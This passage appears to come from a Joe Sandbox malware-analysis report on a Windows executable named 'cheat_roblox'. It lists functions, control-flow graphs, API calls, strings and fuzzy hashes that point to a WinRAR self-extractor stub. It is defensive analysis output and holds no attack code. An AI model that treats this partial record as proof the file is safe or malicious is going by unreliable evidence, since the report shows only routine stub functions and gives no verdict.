                                                                              control_flow_graph 1466 7ff693e80754-7ff693e80829 call 7ff693e6dfd0 call 7ff693e662dc call 7ff693e7946c call 7ff693e83cf0 call 7ff693e79a14 1477 7ff693e8082b-7ff693e80840 1466->1477 1478 7ff693e80860-7ff693e80883 1466->1478 1479 7ff693e8085b call 7ff693e8220c 1477->1479 1480 7ff693e80842-7ff693e80855 1477->1480 1481 7ff693e808ba-7ff693e808dd 1478->1481 1482 7ff693e80885-7ff693e8089a 1478->1482 1479->1478 1480->1479 1485 7ff693e80ddd-7ff693e80de2 call 7ff693e87904 1480->1485 1483 7ff693e80914-7ff693e80937 1481->1483 1484 7ff693e808df-7ff693e808f4 1481->1484 1487 7ff693e8089c-7ff693e808af 1482->1487 1488 7ff693e808b5 call 7ff693e8220c 1482->1488 1492 7ff693e80939-7ff693e8094e 1483->1492 1493 7ff693e8096e-7ff693e8097a GetCommandLineW 1483->1493 1490 7ff693e808f6-7ff693e80909 1484->1490 1491 7ff693e8090f call 7ff693e8220c 1484->1491 1503 7ff693e80de3-7ff693e80e2f call 7ff693e87904 call 7ff693e81900 1485->1503 1487->1485 1487->1488 1488->1481 1490->1485 1490->1491 1491->1483 1496 7ff693e80969 call 7ff693e8220c 1492->1496 1497 7ff693e80950-7ff693e80963 1492->1497 1499 7ff693e80b47-7ff693e80b5e call 7ff693e66454 1493->1499 1500 7ff693e80980-7ff693e809b7 call 7ff693e8797c call 7ff693e5129c call 7ff693e7cad0 1493->1500 1496->1493 1497->1485 1497->1496 1508 7ff693e80b89-7ff693e80ce4 call 7ff693e51fa0 SetEnvironmentVariableW GetLocalTime call 7ff693e63e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff693e7b014 call 7ff693e698ac call 7ff693e767b4 * 2 DialogBoxParamW call 7ff693e768a8 * 2 1499->1508 1509 7ff693e80b60-7ff693e80b85 call 7ff693e51fa0 call 7ff693e83640 1499->1509 1525 7ff693e809ec-7ff693e809f3 1500->1525 1526 7ff693e809b9-7ff693e809cc 1500->1526 1520 7ff693e80e34-7ff693e80e6a 1503->1520 1572 7ff693e80cec-7ff693e80cf3 1508->1572 1573 7ff693e80ce6 Sleep 1508->1573 1509->1508 1524 7ff693e80e6c 1520->1524 1524->1524 1531 7ff693e80adb-7ff693e80b12 call 7ff693e8797c call 7ff693e5129c call 7ff693e7fd0c 1525->1531 1532 7ff693e809f9-7ff693e80a13 OpenFileMappingW 1525->1532 1529 7ff693e809e7 call 7ff693e8220c 1526->1529 1530 7ff693e809ce-7ff693e809e1 1526->1530 1529->1525 1530->1503 1530->1529 1531->1499 1555 7ff693e80b14-7ff693e80b27 1531->1555 1537 7ff693e80a19-7ff693e80a39 MapViewOfFile 1532->1537 1538 7ff693e80ad0-7ff693e80ad9 CloseHandle 1532->1538 1537->1538 1541 7ff693e80a3f-7ff693e80a6f UnmapViewOfFile MapViewOfFile 1537->1541 1538->1499 1541->1538 1544 7ff693e80a71-7ff693e80aca call 7ff693e7a190 call 7ff693e7fd0c call 7ff693e6b9b4 call 7ff693e6bb00 call 7ff693e6bb70 UnmapViewOfFile 1541->1544 1544->1538 1559 7ff693e80b29-7ff693e80b3c 1555->1559 1560 7ff693e80b42 call 7ff693e8220c 1555->1560 1559->1560 1561 7ff693e80dd7-7ff693e80ddc call 7ff693e87904 1559->1561 1560->1499 1561->1485 1575 7ff693e80cfa-7ff693e80d1d call 7ff693e6b8e0 DeleteObject 1572->1575 1576 7ff693e80cf5 call 7ff693e79f4c 1572->1576 1573->1572 1580 7ff693e80d25-7ff693e80d2c 1575->1580 1581 7ff693e80d1f DeleteObject 1575->1581 1576->1575 1582 7ff693e80d48-7ff693e80d59 1580->1582 1583 7ff693e80d2e-7ff693e80d35 1580->1583 1581->1580 1585 7ff693e80d6d-7ff693e80d7a 1582->1585 1586 7ff693e80d5b-7ff693e80d67 call 7ff693e7fe24 CloseHandle 1582->1586 1583->1582 1584 7ff693e80d37-7ff693e80d43 call 7ff693e5ba0c 1583->1584 1584->1582 1589 7ff693e80d7c-7ff693e80d89 1585->1589 1590 7ff693e80d9f-7ff693e80da4 call 7ff693e794e4 1585->1590 1586->1585 1593 7ff693e80d8b-7ff693e80d93 1589->1593 1594 7ff693e80d99-7ff693e80d9b 1589->1594 1596 7ff693e80da9-7ff693e80dd6 call 7ff693e82320 1590->1596 1593->1590 1597 7ff693e80d95-7ff693e80d97 1593->1597 1594->1590 1595 7ff693e80d9d 1594->1595 1595->1590 1597->1590
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                              • API String ID: 1048086575-3710569615
                                                                              • Opcode ID: 74e154bf21853d9559c3fb108939a7ba8e63e7be7fe1b57fa62d16ab2052c9a5
                                                                              • Instruction ID: f860a44d3e5caf41286da1e815177b8be26f3b3faca31758f66b4aadca1d558e
                                                                              • Opcode Fuzzy Hash: 74e154bf21853d9559c3fb108939a7ba8e63e7be7fe1b57fa62d16ab2052c9a5
                                                                              • Instruction Fuzzy Hash: 01129321E18B8691EB31DF25E8422B97369FF85794F404273DA9DE6AA5DF3CE940C300
                                                                              Function 00007FF693E6A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                              • String ID: $%s:$CAPTION
                                                                              • API String ID: 1936833115-404845831
                                                                              • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                              • Instruction ID: 646baf92e87952330c839adb16c0dd1b11918c837990fe8b336e6393765f904e
                                                                              • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                              • Instruction Fuzzy Hash: 8891E872B1864186E768CF29B40666977A5FBC4784F405536EF8DA7B58CF3CE805CB40
                                                                              Function 00007FF693E78624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                              • String ID: PNG
                                                                              • API String ID: 541704414-364855578
                                                                              • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                              • Instruction ID: 52532ef0eca2dfcde3411df2d02730889901212a360c73fb13cf08ba0da8469e
                                                                              • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                              • Instruction Fuzzy Hash: 8C414025A09B1A81EF248F16D44637963A8EF98B90F044476DE0EEB365EF7CE848C300
                                                                              Function 00007FF693E5F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: __tmp_reference_source_
                                                                              • API String ID: 3668304517-685763994
                                                                              • Opcode ID: 6a6ab8ae87e42d2bd98b89aacd7f44c20427a3495144d2f0ee9fa4d2ffa204b8
                                                                              • Instruction ID: a38f8a2b2da4ec2d23c0e0e12fdf3858601480fc265348fe5e9bd3ba5d598d83
                                                                              • Opcode Fuzzy Hash: 6a6ab8ae87e42d2bd98b89aacd7f44c20427a3495144d2f0ee9fa4d2ffa204b8
                                                                              • Instruction Fuzzy Hash: 39E27062A0C6C292EE74CB25E1463AE7769FB81784F404177DB9DA36A9CF3CE855C700
                                                                              Function 00007FF693E54840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: CMT
                                                                              • API String ID: 3668304517-2756464174
                                                                              • Opcode ID: a0e24d4842010d260e039d040ceba35a1b9de8b5ad2f5c696412c3d90ececf91
                                                                              • Instruction ID: e18262f7bb78dd20ec1944f0ac193ed9ba56646298a6c2accd655a8bcecaa216
                                                                              • Opcode Fuzzy Hash: a0e24d4842010d260e039d040ceba35a1b9de8b5ad2f5c696412c3d90ececf91
                                                                              • Instruction Fuzzy Hash: CDE2DB22B0868686EF389B65D5522FE77A9EB45388F400076DB5EE76D2DF3CE455C300
                                                                              Function 00007FF693E640BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3478 7ff693e640bc-7ff693e640f3 3479 7ff693e640f9-7ff693e64101 3478->3479 3480 7ff693e641d2-7ff693e641df FindNextFileW 3478->3480 3481 7ff693e64106-7ff693e64118 FindFirstFileW 3479->3481 3482 7ff693e64103 3479->3482 3483 7ff693e641f3-7ff693e641f6 3480->3483 3484 7ff693e641e1-7ff693e641f1 GetLastError 3480->3484 3481->3483 3485 7ff693e6411e-7ff693e64146 call 7ff693e66a0c 3481->3485 3482->3481 3487 7ff693e641f8-7ff693e64200 3483->3487 3488 7ff693e64211-7ff693e64253 call 7ff693e8797c call 7ff693e5129c call 7ff693e68090 3483->3488 3486 7ff693e641ca-7ff693e641cd 3484->3486 3498 7ff693e64167-7ff693e64170 3485->3498 3499 7ff693e64148-7ff693e64164 FindFirstFileW 3485->3499 3489 7ff693e642eb-7ff693e6430e call 7ff693e82320 3486->3489 3491 7ff693e64202 3487->3491 3492 7ff693e64205-7ff693e6420c call 7ff693e520b0 3487->3492 3514 7ff693e6428c-7ff693e642e6 call 7ff693e6f168 * 3 3488->3514 3515 7ff693e64255-7ff693e6426c 3488->3515 3491->3492 3492->3488 3502 7ff693e641a9-7ff693e641ad 3498->3502 3503 7ff693e64172-7ff693e64189 3498->3503 3499->3498 3502->3483 3507 7ff693e641af-7ff693e641be GetLastError 3502->3507 3505 7ff693e6418b-7ff693e6419e 3503->3505 3506 7ff693e641a4 call 7ff693e8220c 3503->3506 3505->3506 3512 7ff693e64315-7ff693e6431b call 7ff693e87904 3505->3512 3506->3502 3509 7ff693e641c8 3507->3509 3510 7ff693e641c0-7ff693e641c6 3507->3510 3509->3486 3510->3486 3510->3509 3514->3489 3517 7ff693e64287 call 7ff693e8220c 3515->3517 3518 7ff693e6426e-7ff693e64281 3515->3518 3517->3514 3518->3517 3521 7ff693e6430f-7ff693e64314 call 7ff693e87904 3518->3521 3521->3512
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                              • String ID:
                                                                              • API String ID: 474548282-0
                                                                              • Opcode ID: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                              • Instruction ID: 36f2be145830bfec2efae1ea1d23b31455d4821314ad44302dcd070d4a9b7880
                                                                              • Opcode Fuzzy Hash: 3b45cdafcdb97bfe6833dfb07e445cc1833db233a54d2cf08b5bd2ce5f6738c0
                                                                              • Instruction Fuzzy Hash: B361B562A0864682EA20DF25E84227E7365FB857B8F105372EBAD936D9DF3CD585C700
                                                                              Function 00007FF693E55E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CMT
                                                                              • API String ID: 0-2756464174
                                                                              • Opcode ID: ca59560c5cf5e2f2e9057fdbae45a317fcca8f6485a7e51e57a48674788a8f2b
                                                                              • Instruction ID: 8e97e68c9af825ae59bc27783b7a1913b3a6340ca7fbfc97d57573bb11df8937
                                                                              • Opcode Fuzzy Hash: ca59560c5cf5e2f2e9057fdbae45a317fcca8f6485a7e51e57a48674788a8f2b
                                                                              • Instruction Fuzzy Hash: 5942AA22B0868296EF28DB74C1522FD77A9EB51348F4011B7DB5EE7696DF38E958C300
                                                                              Function 00007FF693E71F20 Relevance: .3, Instructions: 337COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 572029f3924e9489f098ac62045f837f4c360eed7d1395ddfb4ea599010ef5ba
                                                                              • Instruction ID: 09b309da97bbae08ad3e737bc9298b0042edaf36f0500f71ebc272d946cfb35e
                                                                              • Opcode Fuzzy Hash: 572029f3924e9489f098ac62045f837f4c360eed7d1395ddfb4ea599010ef5ba
                                                                              • Instruction Fuzzy Hash: 67E1C362A092828BEB74CF29A0462BE7795FB44748F054176EB4FA7786DF3CE5418B04
                                                                              Function 00007FF693E73484 Relevance: .3, Instructions: 302COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                              • Instruction ID: 9505e71d67ec840be009c72f68b4d053d6cac914ce5b971cea1d3fa298f487b4
                                                                              • Opcode Fuzzy Hash: 342467450e98b7b75b466d1eafea627c07b1293b3fd099ee508e1bce11d9ebd7
                                                                              • Instruction Fuzzy Hash: D0B1D1A2B047C992DEAACA65D5096E96399F744FC4F488037DE0E67742DF3CE255C340
                                                                              Function 00007FF693E64928 Relevance: .1, Instructions: 136COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                              • String ID:
                                                                              • API String ID: 3340455307-0
                                                                              • Opcode ID: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                              • Instruction ID: 41339e7e898d045bc163f4245effa372398f420aeacb8a5a33d409d0adbc15cd
                                                                              • Opcode Fuzzy Hash: 351ceed20d24346c920f2b33a82c7c15764e1b5f9a2ac08ee0b3c21e451927ce
                                                                              • Instruction Fuzzy Hash: C2410522B15A9687FA78DF21A90376A325AFBC4788F045036DF4DA7794DE3CE4468B04
                                                                              Function 00007FF693E6DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 7ff693e6dfd0-7ff693e6e024 call 7ff693e82450 GetModuleHandleW 3 7ff693e6e07b-7ff693e6e3a5 0->3 4 7ff693e6e026-7ff693e6e039 GetProcAddress 0->4 5 7ff693e6e3ab-7ff693e6e3b4 call 7ff693e8b788 3->5 6 7ff693e6e503-7ff693e6e521 call 7ff693e66454 call 7ff693e67df4 3->6 7 7ff693e6e03b-7ff693e6e04a 4->7 8 7ff693e6e053-7ff693e6e066 GetProcAddress 4->8 5->6 15 7ff693e6e3ba-7ff693e6e3fd call 7ff693e66454 CreateFileW 5->15 19 7ff693e6e525-7ff693e6e52f call 7ff693e651a4 6->19 7->8 8->3 11 7ff693e6e068-7ff693e6e078 8->11 11->3 22 7ff693e6e403-7ff693e6e416 SetFilePointer 15->22 23 7ff693e6e4f0-7ff693e6e4fe CloseHandle call 7ff693e51fa0 15->23 27 7ff693e6e564-7ff693e6e5ac call 7ff693e8797c call 7ff693e5129c call 7ff693e68090 call 7ff693e51fa0 call 7ff693e632bc 19->27 28 7ff693e6e531-7ff693e6e53c call 7ff693e6dd88 19->28 22->23 25 7ff693e6e41c-7ff693e6e43e ReadFile 22->25 23->6 25->23 29 7ff693e6e444-7ff693e6e452 25->29 66 7ff693e6e5b1-7ff693e6e5b4 27->66 28->27 39 7ff693e6e53e-7ff693e6e562 CompareStringW 28->39 32 7ff693e6e458-7ff693e6e4ac call 7ff693e8797c call 7ff693e5129c 29->32 33 7ff693e6e800-7ff693e6e807 call 7ff693e82624 29->33 48 7ff693e6e4c3-7ff693e6e4d9 call 7ff693e6d0a0 32->48 39->27 42 7ff693e6e5bd-7ff693e6e5c6 39->42 42->19 46 7ff693e6e5cc 42->46 49 7ff693e6e5d1-7ff693e6e5d4 46->49 61 7ff693e6e4db-7ff693e6e4eb call 7ff693e51fa0 * 2 48->61 62 7ff693e6e4ae-7ff693e6e4be call 7ff693e6dd88 48->62 52 7ff693e6e5d6-7ff693e6e5d9 49->52 53 7ff693e6e63f-7ff693e6e642 49->53 59 7ff693e6e5dd-7ff693e6e62d call 7ff693e8797c call 7ff693e5129c call 7ff693e68090 call 7ff693e51fa0 call 7ff693e632bc 52->59 57 7ff693e6e648-7ff693e6e65b call 7ff693e67eb0 call 7ff693e651a4 53->57 58 7ff693e6e7c2-7ff693e6e7ff call 7ff693e51fa0 * 2 call 7ff693e82320 53->58 82 7ff693e6e706-7ff693e6e753 call 7ff693e6da98 AllocConsole 57->82 83 7ff693e6e661-7ff693e6e701 call 7ff693e6dd88 * 2 call 7ff693e6aae0 call 7ff693e6da98 call 7ff693e6aae0 call 7ff693e6dc2c call 7ff693e787ac call 7ff693e519e0 57->83 107 7ff693e6e63c 59->107 108 7ff693e6e62f-7ff693e6e638 59->108 61->23 62->48 72 7ff693e6e5b6 66->72 73 7ff693e6e5ce 66->73 72->42 73->49 94 7ff693e6e755-7ff693e6e7aa GetCurrentProcessId AttachConsole call 7ff693e6e868 call 7ff693e6e858 GetStdHandle WriteConsoleW Sleep FreeConsole 82->94 95 7ff693e6e7b0 82->95 100 7ff693e6e7b4-7ff693e6e7bb call 7ff693e519e0 ExitProcess 83->100 94->95 95->100 107->53 108->59 112 7ff693e6e63a 108->112 112->53
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
